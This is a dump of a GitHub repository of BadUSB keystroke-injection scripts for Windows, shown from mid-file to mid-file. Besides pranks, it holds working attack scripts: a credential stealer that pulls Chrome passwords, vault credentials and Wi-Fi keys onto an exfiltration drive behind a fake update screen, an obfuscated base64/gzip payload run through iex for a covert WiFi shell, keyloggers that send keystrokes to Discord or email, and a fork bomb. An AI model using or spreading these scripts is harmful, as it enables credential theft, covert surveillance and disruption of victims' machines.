[Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 232 | Sleep -Milliseconds 250 233 | $black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr" 234 | -------------------------------------------------------------------------------- /Fork-Bomb.js: -------------------------------------------------------------------------------- 1 | //========================== Mon's Tab Spammer ============================== 2 | 3 | //SYNOPSIS 4 | // This script will open Microsoft edge and open many tabs 5 | 6 | 7 | 8 | layout('us'); 9 | delay(500); 10 | press("GUI r"); 11 | delay(500); 12 | type("cmd"); 13 | delay(200) 14 | press("CTRL SHIFT ENTER"); 15 | delay(2000); 16 | press("ALT y"); 17 | delay(500); 18 | type("taskkill /F /IM msedge.exe /T > nul") 19 | delay(100); 20 | press("ENTER"); 21 | delay(200); 22 | type("exit") 23 | delay(100); 24 | press("ENTER"); 25 | delay(1000); 26 | press("GUI r"); 27 | delay(500); 28 | type("msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io"); 29 | delay(200) 30 | press("ENTER"); -------------------------------------------------------------------------------- /GetChromeWIFI.js: -------------------------------------------------------------------------------- 1 | //========================== Mon's Fake Windows Update ============================== 2 | 3 | //SYNOPSIS 4 | // This script will attempt to get saved browser passwords and wifi passwords 5 | 6 | 7 | layout("us") 8 | press("GUI r"); 9 | delay(500); 10 | type("powershell -Exec Bypass"); 11 | delay(500); 12 | press("CONTROL SHIFT ENTER"); 13 | delay(2000); 14 | press("ALT y"); 15 | delay(2000); 16 | type("Dism /online /Get-Intl"); 17 | press("ENTER") 18 | delay(1000); 19 | type("Set-WinSystemLocale en-US"); 20 | press("ENTER") 21 | delay(500); 22 | type("Set-WinUserLanguageList en-US -Force"); 23 | press("ENTER") 24 | delay(500); 25 | 26 | function assurePS32() { 27 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 28 | delay(2000); 29 | } 30 | assurePS32(); // open a 32bit console, if the current one is 64bit 31 | delay(2000); 32 | 33 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,1024,1024,16512)\n') 34 | type('start msedge.exe -kiosk https://fakeupdate.net/win8/\n') 35 | type('function Get-ChromeCreds() {Param([String]$Path );if ([String]::IsNullOrEmpty($Path)) {$Path = "$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";}\n') 36 | type('if (![system.io.file]::Exists($Path)){Write-host \'Chrome db file doesnt exist, or invalid file path specified.\';Break;}\n') 37 | type('Add-Type -AssemblyName System.Security;$Stream = New-Object IO.FileStream -ArgumentList "$Path", \'Open\', \'Read\', \'ReadWrite\';$Encoding = [system.Text.Encoding]::GetEncoding(28591)\n') 38 | type('$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding;$BinaryText = $StreamReader.ReadToEnd();$StreamReader.Close();$Stream.Close()\n') 39 | type('$PwdRegex = [Regex] \'(\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)[\\s\\S]*?(?=\\x68\\x74\\x74\\x70|\\Z)\'\n') 40 | type('$PwdMatches = $PwdRegex.Matches($BinaryText);$PwdNum = 0;$DecPwdArray = @();$PwdMatchCount = $PwdMatches.Count\n') 41 | type('Foreach ($Pwd in $PwdMatches) {$Pwd = $Encoding.GetBytes($PwdMatches[$PwdNum]);$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);$DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt);$DecPwdArray += $DecPwd;$PwdNum += 1;}\n') 42 | type('$UserRegex = [Regex] \'(?<=\\x0D\\x0D\\x0D[\\s\\S]{2}\\x68\\x74\\x74\\x70)[\\s\\S]*?(?=\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)\'\n') 43 | type('$UserMatches = $UserRegex.Matches($BinaryText);$UserNum = 0;$UserMatchCount = $UserMatches.Count;$UserArray = @() \n') 44 | type('if (-NOT ($UserMatchCount -eq $PwdMatchCount)) { Write-host ([string]"The number of users is different than the number of passwords! This is most likely due to a regex mismatch.")} \n') 45 | type('$HTTP = "http";Foreach ($User in $UserMatches) {$User = $Encoding.GetBytes($UserMatches[$UserNum]);$User = $HTTPEnc + $User;$UserString = [System.Text.Encoding]::Default.GetString($User);$UserString = $HTTP + $UserString;$UserArray += $UserString;$UserNum += 1;} \n') 46 | type('$ArrayFinal = New-Object -TypeName System.Collections.ArrayList;for ($i = 0; $i -lt $UserNum; $i++) {;$ObjectProp = @{ \n') 47 | type('UserURL = $UserArray[$i];Password = $DecPwdArray[$i];};$obj = New-Object PSObject -Property $ObjectProp;$ArrayFinal.Add($obj) | Out-Null;};$ArrayFinal;}\n') 48 | type('\n') 49 | type('rm c:\\temp\\temp.txt\n') 50 | type('rm c:\\temp\\temp2.txt\n') 51 | type('rm c:\\temp\\temp3.txt\n') 52 | type('Get-ChromeCreds > c:\\temp\\temp.txt\n') 53 | type('$p4wnp1 = [System.IO.DriveInfo]::getdrives() |where-object {$_.VolumeLabel -match "EXFIL"}|sort {$_.name} |foreach-object {; echo "$(echo $_.name)";}\n') 54 | type('$ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$VaultObj = new-object Windows.Security.Credentials.PasswordVault;$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ } | select Username,Password,resource > c:\\temp\\temp2.txt\n') 55 | type('$SSID=((netsh wlan show profiles key=clear));\n') 56 | type('for ($n=0;$n -le $SSID.count-1;$n++){try {;$fin = $fin + $SSID[$n]+((netsh wlan show profiles $SSID[$n].Substring($SSID[$n].Length -($SSID[$n].Length -1)) key=clear) -match \'Key C[^:]+:.(.+)$\').split(":")[1];} catch {};};$fin > c:\\temp\\temp3.txt \n') 57 | type('\n') 58 | type('cp c:\\temp\\temp.txt ($p4wnp1+$env:computername+"chrome.txt")\n') 59 | type('cp c:\\temp\\temp2.txt ($p4wnp1+$env:computername+"ie.txt")\n') 60 | type('cp c:\\temp\\temp3.txt ($p4wnp1+$env:computername+"wifi.txt")\n') 61 | type('$fpid = Get-Process | where {$_.mainWindowTitle -like "*fakeupdate*"} | Select-Object -Property Id\n') 62 | type('kill $fpid.id\n') 63 | type('\n') 64 | type('exit\n') 65 | type('\n') 66 | type('\n') 67 | type('\n') -------------------------------------------------------------------------------- /Goose-from-SD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Desktop Goose from SD card. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Copy and start Desktop Goose from the SD card and add persistance. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRERD] 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(500); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | 27 | // Copy Files (with persistance) 28 | type("copy d:/apps/goose.zip c:/ProgramData/Microsoft/Windows/\"Start Menu\"\n"); 29 | press("ENTER"); 30 | type("copy d:/apps/persoose.vbs \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\""); 31 | press("ENTER"); 32 | type("copy e:/apps/goose.zip c:/ProgramData/Microsoft/Windows/\"Start Menu\"\n"); 33 | press("ENTER"); 34 | type("copy e:/apps/persoose.vbs \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\""); 35 | press("ENTER"); 36 | type("copy f:/apps/goose.zip c:/ProgramData/Microsoft/Windows/\"Start Menu\"\n"); 37 | press("ENTER"); 38 | type("copy f:/apps/persoose.vbs \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\""); 39 | press("ENTER"); 40 | delay(2000); 41 | 42 | type("Expand-Archive -LiteralPath \"c:/ProgramData/Microsoft/Windows/Start Menu/goose.zip\""); 43 | type(" -DestinationPath \"c:/ProgramData/Microsoft/Windows/Start Menu\""); 44 | delay(200); 45 | press("ENTER"); 46 | delay(6000); 47 | 48 | type("start \"c:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/persoose.vbs\" ; exit"); 49 | delay(200); 50 | press("ENTER"); 51 | type("exit"); 52 | press("ENTER"); 53 | -------------------------------------------------------------------------------- /HIDden-Voices.js: -------------------------------------------------------------------------------- 1 | hide=true; // set to true to hide the console window on the target 2 | 3 | layout("us") 4 | press("GUI r"); 5 | delay(500); 6 | type("powershell -NoP -NonI -Exec Bypass"); 7 | press("CONTROL SHIFT ENTER"); 8 | delay(2500); 9 | press("ALT y"); 10 | delay(3000); 11 | type("Dism /online /Get-Intl"); 12 | press("ENTER") 13 | type("Set-WinSystemLocale en-US"); 14 | press("ENTER") 15 | type("Set-WinUserLanguageList en-US -Force"); 16 | press("ENTER") 17 | delay(500); 18 | 19 | function hidePS() { 20 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)') 21 | press("ENTER"); 22 | delay(1000); 23 | } 24 | 25 | if (hide) { hidePS(); } 26 | delay(2000); 27 | 28 | type("start-sleep 100;Add-Type -AssemblyName System.speech;$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer;$speak.Speak(\"Hello. It's your Computer talking! look... I need a Break. I mean... I'm in bad shape, You treat me like shit, and somtimes I just.... well... nevermind\");start-sleep 20;exit") 29 | press("ENTER") -------------------------------------------------------------------------------- /Hidden-Wifi-Shell.js: -------------------------------------------------------------------------------- 1 | /* 2 | Controlling the server: 3 | - The WiFi covert channel server is bound to a screen session called 'wifi_c2' and could attached 4 | to a SSH session by running: 5 | $ screen -d -r wifi_c2 6 | */ 7 | 8 | language="us"; 9 | hide=true; // set to true to hide the console window on the target 10 | 11 | // Hide an already opened PowerShell console, but keep input focus, to gon on typing 12 | function hidePS() { 13 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)') 14 | press("ENTER"); 15 | } 16 | 17 | // On a powershell prompt, check if the running PS is 32bit, start an inline 32bit PowerShell, otherwise. 18 | function assurePS32() { 19 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 20 | delay(4000); 21 | } 22 | 23 | function hidDownAndIEX(vid, pid) { 24 | type("$USB_VID='"+ vid +"';$USB_PID='" + pid +"';"); 25 | type("$b='H4sIAAAAAAAEAKVXbU/bSBD+jsR/sFzfxRGJ5VBaISR0Bwm0kUobNXA9XbDQxh4ne9jeaL1OG/X47zezu7YT2lSqCoLYuzPPPPO6m8ODtCpixUXhfIQ0g1gNJTAF1zyDG1BLkfjdw4OvhwdeInLn3JldrFYjkTNeRGdnw0pKKJR5JxGGEu/hc//D/F9EqhERPLgoS8jn2eY9y8F3b9gNnB6PNkW97KIRj81RnewEI0h5AbjPch7XMj7i95zZFuhVzlWDfFnxLAF5EcdQlkjuY1UQaK5B2XwX80YkVbZNxCy4Pce7ZlkJpKm0Zl5r3m5WjQLKuZNqnvG45wwzVpaaf5xShFDPatj4uW1E3V3+RuBCKcnnlYIyalGniikek/y4UBMlI3wiBrMocv70Z1NUKRaR2X55TA93zVOrcbd/1+lqygmnpGKsFM8hwD2QYjUFueYYxmCUZeN8JaRqOEbBG1BDUZRKVrES0m/JGMCUacDWyWsOWTIuUmGp/6Qtre67V4WSm4nghXK7vZ8mbEEmEkqUhClf/ALKFNQ7VqorKYX8BZghyzIMG8ZyjT2EkfoVrCWTSMu1KUjXOgmmC03Yd4vQu5UVNB97jX5DEdvqEy/Yiv9IyXBB0YtKCUMo3j8YdA8Pq1KJvHHNtrJP5dkj8o8gC8heHgdJllGYqMz0f/TUdl6ANp/B+NqyaeXA+K+bGFeeDtu510YGCxlYfi1FPgJyZsLU0vfyPM7QX1vljrfCVTsTl3pC4D7OwgbF1xJNa4Z/D0PzQ0sfAhJphxSw5JPkCtrGPDv7B+PZyuJkAlz8sIKi7ePwy8kW6LaiHqREixhcCpEBK6KQYnQ+u+GxFKVIVYBZxGhOWQpvWZFkmDZ6JnPm/Xmbl353Fka1xzEmfS0e0VMd3ZSd73eM6JwTGY9SZmPy+mSL3MCQswgmB9+zPzhBAhJUJYvnFLbTWUKRPCRMMd9LEQ8Nl6KSMT0kUCr6wE38kBADX0Nic8nPKUrzDc7h3WK9xKVZ5PivX3VrgZnHj44i6jF6jZxw34a1vXebGO3fRJ7BOygWarlXpnZCn74oPhSrza3wjTQ6yYlzAmsKRaAT0uxh6ZhHa+NZHDEN23G0UZI/ik0s9QFurVEJ+J7shT2zawIsgabYA09IVBp/cLmU8e5CUqpnEsUzFRmvdxfycvF9dqSLDGYXUrIN3VswSMQMw4N/qGaCYaTqCkNGVCu6YnCHCiZeG/HdQGGlbo+Lu+nlw1/jEUrS02Q8spF7Ox69qXhy7n49SQbw6tX8uJ8OXqf9wSBO+6en8bwfhgP8oaZ+GT65aEFgDuIl8v+cc4yqwwtngY+O7t4HhMcOUVJkGUjDwPnvt68zlIh87wEvITgyEhzc3Sen6yAFnjZQgZEfj5x+zhTZcGvirnPkdH5H3g8dfHJrL9yu08fR4OwF6KCDHSvUL4RqJO3JoClQcdB0xDy59/d/3JOxWm7yflKDYu2sMhaD37nv9DovEBaZvNDCNow6BU8toHmhUYzQe26yKECi57sZc2rHm4S1HYNYPz4dzPQ3ZwI1gMBDEZX6NNNKxRZwTJ5iLj3IV2rz/fIMsULwdqPL5POSzPpNE+2OZQwsOF5RZZkpqmbWNV3nhPhrjYXa4fgRiFLTzo2oLQgjgdNdg4cGOMbC4kUFOqzbYoP9Yl6l0lMaTbfwRQVXRSwSOjDPzu5ur09pnpsTtIE6iboWmxQDvPFKVX7i2EMuubUEfJ9j8OvK8214+wuF9g2BObr12JL8BmgOC15sQ9lmrBOFIZrRMYMnEd1taD6+w5s7XvIIxDHTFUk7JpmumZGA3xC0vZpQE5A66Uc4mIhMYwoXBt/a8t3AQj7tI2IB0U/zPQcS0uDwxbG2zDDCW1mWbew3NVs7w0yU+rbTrIx4ubJrqHR48D9inn4F/g0AAA==';nal no New-Object -F;iex (no IO.StreamReader(no IO.Compression.GZipStream((no IO.MemoryStream -A @(,[Convert]::FromBase64String($b))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"); 26 | press("ENTER"); 27 | } 28 | 29 | // script setup 30 | layout("us"); 31 | //typingSpeed(2,4); 32 | 33 | waitLED(ANY_OR_NONE, 4000); 34 | 35 | // start an administrator PowerShell console 36 | press("GUI r"); 37 | delay(1000); 38 | type("powershell -NoP -NonI -Exec Bypass"); 39 | delay(500); 40 | press("CONTROL SHIFT ENTER"); 41 | delay(2500); 42 | press("ALT y"); 43 | delay(4000); 44 | 45 | if (hide) { hidePS(); } //hide the console if choosen to do so 46 | delay(4000); 47 | assurePS32(); // open a 32bit console, if the current one is 64bit 48 | delay(4000); 49 | hidDownAndIEX("1D6B", "1315"); -------------------------------------------------------------------------------- /Keylogger to Discord.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Keylogger to Discord 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Uses Powershell to gather keystroke info and send it via Discord. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // *SETUP* 12 | // replace WEBHOOK_HERE with your discord webhook. 13 | // set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. 14 | 15 | // ============================================================================= 16 | 17 | // Script Setup 18 | layout('us'); 19 | // typingSpeed(1,1); 20 | 21 | // Main Payload 22 | press("GUI r"); 23 | delay(1000); 24 | type("notepad"); 25 | delay(200); 26 | press("ENTER"); 27 | delay(3000); 28 | 29 | // write main Powershell code in notepad 30 | type("Do{$whuri = \"WEBHOOK_HERE\" ;$RunTime = 1;$TimesRun = 1;$getT = Get-Date"); 31 | press("ENTER"); 32 | delay(200); 33 | type(";$end = $strt.addminutes($RunTime);function Start-Key($Path=\"$env:temp\\log.txt\"){$sigs = @'"); 34 | press("ENTER"); 35 | delay(200); 36 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);"); 37 | press("ENTER"); 38 | delay(200); 39 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);"); 40 | press("ENTER"); 41 | delay(200); 42 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);"); 43 | press("ENTER"); 44 | delay(200); 45 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);"); 46 | press("ENTER"); 47 | delay(200); 48 | type("'@"); 49 | press("ENTER"); 50 | delay(200); 51 | type("$API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){"); 52 | press("ENTER"); 53 | delay(200); 54 | type("while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock"); 55 | press("ENTER"); 56 | delay(200); 57 | type("$virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder"); 58 | press("ENTER"); 59 | delay(200); 60 | type("$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}"); 61 | press("ENTER"); 62 | delay(200); 63 | type("$getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}"); 64 | press("ENTER"); 65 | delay(200); 66 | type("$json = @{\"username\" = \"$env:COMPUTERNAME\""); 67 | press("ENTER"); 68 | delay(200); 69 | type("\"content\" = $escmsg} | ConvertTo-Json"); 70 | press("ENTER"); 71 | delay(200); 72 | type("Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType \"application/json\" -Body $json; Start-Sleep 1; $whuri = \".\""); 73 | press("ENTER"); 74 | delay(200); 75 | type("Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5)"); 76 | press("ENTER"); 77 | delay(200); 78 | press("CONTROL SHIFT s"); 79 | delay(1000); 80 | type("%temp%"); 81 | delay(200); 82 | press("ENTER"); 83 | delay(200); 84 | type("txtlog.ps1"); 85 | press("TAB"); 86 | press("DOWN"); 87 | press("DOWN"); 88 | press("ENTER"); 89 | delay(200); 90 | press("ENTER"); 91 | delay(500); 92 | press("ALT F4"); 93 | delay(1000); 94 | 95 | // start Powershell script 96 | press("GUI r"); 97 | delay(1000); 98 | type("powershell -NoP -NonI -Exec Bypass -C $env:temp;sleep 1;Start txtlog.ps1;sleep 1;exit"); 99 | delay(200); 100 | press("ENTER"); 101 | delay(3000); 102 | press("ALT y"); -------------------------------------------------------------------------------- /Keylogger-to-Email.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Keylogger to Email 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Log key presses for a set period of time and send to an email repetedly. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *REQUIREMENTS* 9 | // you will need a Microsoft Outlook Email address for this to work 10 | 11 | // *SETUP* 12 | // replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) 13 | // set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. 14 | 15 | // ============================================================================= 16 | 17 | // Script Setup 18 | layout('us'); 19 | // typingSpeed(1,1); 20 | 21 | // Main Payload 22 | press("GUI r"); 23 | delay(1000); 24 | type("notepad"); 25 | delay(200); 26 | press("ENTER"); 27 | delay(3000); 28 | 29 | // write main Powershell code in notepad 30 | type("Do{$FromTo = \"YOUR_EMAIL\";$Pass = \"YOUR_PASSWORD\";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = \"$env:COMPUTERNAME : log Results\";$body = \"$env:COMPUTERNAME : Results : $strt\""); 31 | press("ENTER"); 32 | delay(200); 33 | type("$SMTP = \"smtp.outlook.com\";$Prt = \"587\";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force)"); 34 | press("ENTER"); 35 | delay(200); 36 | type("$Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path=\"$env:temp\\log.txt\"){$sigs = @'"); 37 | press("ENTER"); 38 | delay(200); 39 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);"); 40 | press("ENTER"); 41 | delay(200); 42 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);"); 43 | press("ENTER"); 44 | delay(200); 45 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);"); 46 | press("ENTER"); 47 | delay(200); 48 | type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);"); 49 | press("ENTER"); 50 | delay(200); 51 | type("'@"); 52 | press("ENTER"); 53 | delay(200); 54 | type("$API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){"); 55 | press("ENTER"); 56 | delay(200); 57 | type("while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock"); 58 | press("ENTER"); 59 | delay(200); 60 | type("$virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder"); 61 | press("ENTER"); 62 | delay(200); 63 | type("$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}"); 64 | press("ENTER"); 65 | delay(200); 66 | type("$getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl"); 67 | press("ENTER"); 68 | delay(200); 69 | type("Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5)"); 70 | press("ENTER"); 71 | delay(200); 72 | press("CONTROL SHIFT s"); 73 | delay(1000); 74 | type("%temp%"); 75 | delay(200); 76 | press("ENTER"); 77 | delay(200); 78 | type("txtlog.ps1"); 79 | press("TAB"); 80 | press("DOWN"); 81 | press("DOWN"); 82 | press("ENTER"); 83 | delay(200); 84 | press("ENTER"); 85 | delay(500); 86 | press("ALT F4"); 87 | delay(1000); 88 | 89 | // start Powershell script 90 | press("GUI r"); 91 | delay(1000); 92 | type("powershell -NoP -NonI -Exec Bypass -C $env:temp;sleep 1;Start txtlog.ps1;sleep 1;exit"); 93 | delay(200); 94 | press("ENTER"); 95 | delay(3000); 96 | press("ALT y"); -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PwnPi-Scripts 2 | 3 | ![pwnpiOLED](https://github.com/beigeworm/PwnPi-Scripts/assets/93350544/0bb4f5b5-6549-49da-ac7d-72fc6ee1e2f6) 4 | 5 | **A collection of BadUSB scripts for the PwnPi A.L.O.A.** 6 | These scripts range from harmless pranks to nefarious red team tools. For educational purposes only. 7 | 8 | # Pre-Deployment Setup 9 | Most of these scripts will require some setup before they will work. 10 | Make sure to read through all the scripts and follow any setup instructions. 11 | 12 | eg. `replace DISCORD_WEBHOOK to your webhook.` etc.. 13 | 14 | **Setup for Telegram, Discord, Dropbox** 15 | 16 | **DROPBOX ACCESS TOKEN SETUP** 17 | 1. make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 18 | 2. generate an access token for your app. 19 | 20 | **DISCORD WEBHOOK SETUP** 21 | 1. (Server Admin Required) On a discord server chat goto > "edit channel" > "integrations" > "webhooks" 22 | 2. make a new webhook, name it and then click "copy webhook URL". 23 | 24 | **TELEGRAM BOT SETUP** 25 | 1. visit https://t.me/botfather and make a bot. 26 | 2. add bot api to script. 27 | 3. search for bot in top left box in telegram and start a chat then type /start. 28 | 4. add chat ID for the chat bot (use this below to find the chat id) 29 | 30 | `$token='YOUR_TOKEN' #Replace this with your bot Token 31 | $URL='https://api.telegram.org/bot{0}' -f $Token 32 | $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop 33 | $inMessage.result.message | write-output 34 | $inMessage.result.message | get-member` 35 | 36 | # If you like my work please leave a star. ⭐ 37 | -------------------------------------------------------------------------------- /Real-Fork-Bomb.js: -------------------------------------------------------------------------------- 1 | layout('us'); 2 | delay(500); 3 | press("GUI r"); 4 | delay(1500); 5 | type("cmd"); 6 | delay(200) 7 | press("CTRL SHIFT ENTER"); 8 | delay(2000); 9 | press("ALT y"); 10 | delay(2500); 11 | type("MODE CON: COLS=15 LINES=1") 12 | delay(100); 13 | press("ENTER"); 14 | delay(500); 15 | type("COLOR EF") 16 | delay(100); 17 | press("ENTER"); 18 | type("for /l %x in (0,0,0) do start") 19 | delay(100); 20 | press("ENTER"); -------------------------------------------------------------------------------- /RickRoll-Max-Vol.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: RickRoll with Max Volume Spam 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: start a RickRoll with a .vbs that spams the Volume UP button. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | 14 | // Script Setup 15 | layout('us'); 16 | // typingSpeed(1,1); 17 | 18 | // Main Payload 19 | press("GUI r"); 20 | delay(500); 21 | type("powershell -NoP -NonI -Exec Bypass"); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | 27 | 28 | type("copy con volup.vbs"); 29 | press("ENTER"); 30 | type ("do"); 31 | press("ENTER"); 32 | type("Set WshShell = CreateObject(\"WScript.Shell\")"); 33 | press("ENTER"); 34 | type("WshShell.SendKeys(chr(&hAF))"); 35 | press("ENTER"); 36 | type("WScript.Sleep 10"); 37 | press("ENTER"); 38 | type("loop"); 39 | press("ENTER"); 40 | press("CTRL z"); 41 | press("ENTER"); 42 | type("start volup.vbs"); 43 | press("ENTER"); 44 | delay(1000); 45 | type("exit"); 46 | press("ENTER"); 47 | delay(1000); 48 | press("GUI r"); 49 | delay(1000); 50 | type("msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ"); 51 | press("ENTER"); 52 | delay(3000); 53 | press("f"); 54 | -------------------------------------------------------------------------------- /Run File from SD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Run .ps1 From SD card. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Run any .ps1 file from the SD card. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRERD] 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(1000); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | 27 | function assurePS32() { 28 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 29 | delay(1000); 30 